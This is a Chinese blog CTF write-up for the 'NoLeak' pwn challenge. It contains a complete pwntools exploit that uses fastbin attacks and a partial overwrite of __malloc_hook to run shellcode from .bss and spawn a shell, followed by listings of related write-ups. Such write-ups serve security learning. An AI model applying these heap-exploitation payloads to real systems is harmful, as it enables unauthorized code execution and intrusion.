Xman 选拔赛 NoLeak writeup

最新推荐文章于 2021-01-19 00:56:44 发布
最新推荐文章于 2021-01-19 00:56:44 发布
阅读量782 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/81535179
版权

很久没发博客了,就随便写一下吧
想出一道House of Roman的题,然后去找了下类似的题目,记起来选拔赛的时候好像有一道NoLeak,那时候队里面的师傅做了,我就懒得做了,现在回顾了下,发现根本不用house of Roman就能get shell,直接partial write就可以写malloc hook,然后将shell code 写到bss段,跳到bss段get shell

下面是payload,用了两次fast bin attack

from pwn import *

debug=1

context.log_level='debug'

if debug:
    p=process('./NoLeak',env={'LD_PRELOAD':'./libc.so'})
    gdb.attach(p)
else:
    p=remote('',)

def ru(x):
    return p.recvuntil(x)

def se(x):
    p.send(x)

def create(sz,content):
    se('1\n')
    ru('Size: ')
    se(str(sz)+'\n')
    ru('Data: ')
    se(content)
    ru('Your choice :')

def delete(idx):
    se('2\n')
    ru('Index: ')
    se(str(idx)+'\n')
    ru('Your choice :')

def update(idx,sz,content):
    se('3\n')
    ru('Index: ')
    se(str(idx)+'\n')
    ru('Size: ')
    se(str(sz)+'\n')
    ru('Data: ')
    se(content)
    ru('Your choice :')

# fast bin attack control bss
create(0x68,'a')
create(0x68,'b')
delete(0)
update(0,8,p64(0x600ff5))
create(0x68,'c')
create(0x68,'\x00'*0x53)

# partial write control and fastbin attack control __mallock_hook+5
create(0x68,'a')
create(0x68,'b')
create(0x88,'c')
create(0x68,'d')

delete(2)
delete(1)
delete(0)

update(0,1,'\xc0')
update(2,1,'\x05')
update(1,0x69,'\x00'*0x68+'\x71')

create(0x68,'e')
create(0x68,'f')
create(0x68,'g')


# partial write control __mallock_hook
context.arch='amd64'
payload=asm(shellcraft.sh()).ljust(0x73,'\x00')+'\x10'

update(3,len(payload),payload)
update(7,8,p64(0x601005 ))

p.interactive()
charlie_heng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【CTF大赛】第五届XMan选拔赛 ezCM Writeup
HBohan的博客
08-12 826
ezCM 直至比赛结束,这道题目都是 0 解题,一方面是因为比赛时间较短,另一方面还是因为这道题目较难,考察了不常见的椭圆曲线算法(ECC),大大增加了对做题者的要求。 题目信息 题目是使用 Golang 来编写的一个 CrackMe 程序,程序内符号没有被去除,所以这篇文章就不会讲解如何恢复 Golang 程序符号,另外 IDA Pro 7.6 已经支持 Golang 程序分析,打开就可以直接恢复被去除的符号信息。 题目要求打开一个 KeyFile ,并且通过读取其文件的内容来注册程序,我们要做的就是通
Noleak(xctf)
weixin_43868725的博客
08-19 474
0x0 程序保护和流程 保护: 流程: main() create() delete() free之后没有将指针置空,存在UAF。 edit() 没有对输入数据的大小作出限制,存在堆溢出。 0x1 利用过程 1.题目中的got表不可写,又没有输出函数,无法泄露地址,但是堆栈上可以执行代码,所以需要一个可执行的指针变量指向shellcode的地址,才能够执行shellcode。 2.可以使用Unsorted bin attack改写buf中指向chunk的地址为main_arena的地址,之后通过u
Xman非常好用
07-30
请勿在未经授权的情况下上传任何涉及著作权侵权的资源,除非该资源完全由您个人创作
CTF-PWN Noleak (unsortedbin attack+fastbin attack+malloc_hook)
SuperGate的博客
11-25 895
漏洞简述 [*] '/home/supergate/Desktop/Pwn/timu' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Ha...
攻防世界PWN之Noleak(一题学了好多知识)题解
seaaseesa的博客
11-13 3708
Noleak 本题需要用到的知识有:malloc_hook、unsorted bin unlink、fastbin attack、partial write bypass PIE 首先,介绍一下malloc_hook,这是C语言提供的一个用来包装malloc的,类似还有free_hook,具体可以查阅相关资料学习 Malloc hook 我们看如下代码 #include&...
攻防世界(pwn)Noleak
PLpa的博客
03-03 1486
前言: 看了大佬们的writeup,发现这题解法真的非常多,我这里用的是unsortedbin的地址写漏洞,详情可以看ctfwiki了解漏洞原因。 没开NX,有可以执行的堆栈,但是开启了Full RELRO,不能修改got表地址了。 打开IDA: 发现是一个菜单题,可以创建,删除,更新堆快信息,没有输出信息的选项,果然Noleak。 我们这里可以一个一个功能去看,看看漏洞存在哪里: 经过观察...
攻防世界进阶noleak
qq_42728977的博客
04-07 387
题目:XCTF 4th-QCTF-2018 noleak 难度:**** 漏洞点:UAF \unsorted bin sttack\partial write bypass PIE\unlink 参考链接: 伪造堆块绕过unlink检查(ctf-QiangWangCup-2015-shellman) 攻防世界PWN之Noleak(一题学了好多知识)题解 ctfwiki CTF pwn 中最通俗易懂...
noleak_app
11-28
noleak_app
xman-frontend
05-29
Xman 前端 运行项目 克隆项目 运行npm install或yarn 运行npm start或yarn start 与后端集成 前端通过 REST API 连接到后端的不同服务。 服务的文档链接如下 如果您需要访问用户的访问令牌,您可以通过 import ...
xman-service-auth
05-28
syncdb xman-addadmin xman-generatekeys xman-createdb xman-gmailtokengenerator用法建立资料库在项目目录内的命令行中键入xman-createdb 数据库同步在项目目录内的命令行中输入xman-syncdb 将新用户添加到数据库...
xmdp:Xman 的桌面
05-29
XMDP是XMan’s Desktop Platform的简称。XMan是本文的作者,我们是一个小团体,就像电影里的那帮神奇能力者一样。我们打算构建自己的桌面平台,为了便于大家以及未来的成员开展工作,所以打算一边撰写相关的说明文档...
xman量化交易
02-28
视频教程 讲述xman量化交易平台,是一个基于js的量化交易平台
XCTF 4th-QCTF-2018——Noleak分析
Eagle_hwei的博客
02-14 592
Noleak的题目分析 2020-02-1321:52:33 by hawkJW 题目附件、ida文件及wp链接   这道题考察的比较综合,设置到方方面面的知识点,这里记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看到,RELRO保护全开,则没有办法修改got表了,同时开启了Canary保护,栈溢出可能也有一定困难;但是我们看到,有NX没有开启,...
XMAN选拔赛官方Writeup
热门推荐
zsj2102的专栏
07-20 2万+
XMan选拔赛官方Writeup XMan 2017 Baaa [原理] 栈溢出。 [目的] 盲打栈溢出。 [环境] Ubuntu。 [工具] gdb、objdump、python。 [步骤] 拿到题目,发现并没有给二进制,估计是盲打。nc一下,发现返回了一个地址,我们尝试不同大小payload,最后确定下来大约为72位junk加上16位的地址。 exp from
攻防世界-Noleak-Writeup
aptx4869_li的博客
01-19 327
解题思路 参考一位大佬的解题思路: https://www.freesion.com/article/3386496214/ ,结合自己的理解与分析完成此题的漏洞利用 基本信息查询 healer@healer:~/Documents/CTF/PWN/Noleak$ readelf -h timu ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class:
攻防世界-PWN进阶区-Noleak(XCTF 4th-QCTF-2018)
weixin_44145820的博客
03-01 846
本题主要考察对堆的利用,需要有一定的背景知识,本文也参考了几篇大佬的Writeup,让本文尽可能详细。 题目分析 checksec: 本题的RELRO是完全开启的,意味着我们不能通过修改GOT表来进行攻击 以下是源代码: main函数 delete函数: 这里可以看到free之后没有把指针置空,可能有UAF或者Dubble Free edit函数: 在本函数中,没有检测大小就直接写入,明显...
exit_hook劫持
starssgo的博客
04-13 4661
更改exit()某一结构体,再调用exit()可以实现程序流程的劫持。 原理分析 首先查看exit()源代码,我的libc=2.27 调用__run_exit_handlers函数,查看源代码, exit.c 77行。 while (cur->idx > 0) { struct exit_function *const f = &cur->fns[-...
noxCTF-pwn1-格式化字符串
Peanuts
09-09 566
格式化字符串 额额博客爆炸。。之前写的都没了懒得再写一遍了太坑了这博客就发个wp吧,过程就是远程泄漏ret地址,因为没有开alsr from pwn import * context.log_level='debug' elf = ELF('./believeMe.dms') libc = elf.libc p = remote('18.223.228.52',13337) #p = pr...
pwnable.kr ascii_easy writeup
charlie_heng的专栏
02-12 1717
兜兜转转,又回来这里刷题 这题讲真有点难度,虽然在实际比赛的时候比较少可能会出现这类题…….. 很明显可以用rop,但是rop链只能全部为ascii可见字符…..这就有点难度了 这题其实我想了好几种办法,但是实际用了只有一种,不过在这里也说下 利用rop链将ebx的值改为libc中got表的地址,然后跳转到one gadget 这个本来感觉是最快捷的办法,但是将gadget过滤掉一部分...
XMAN := xman -prj ${PRJ_NAME}详细解释解释上述makefile
最新发布
04-28
这是一个 Makefile 中的变量赋值语句,它将 xman 变量的值设置为 `${PRJ_NAME}` 变量的值,并在变量名称前添加了 `-prj` 前缀。这个 Makefile 似乎是为了某个工程项目(即 `${PRJ_NAME}`)而编写的,XMAN 变量可能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值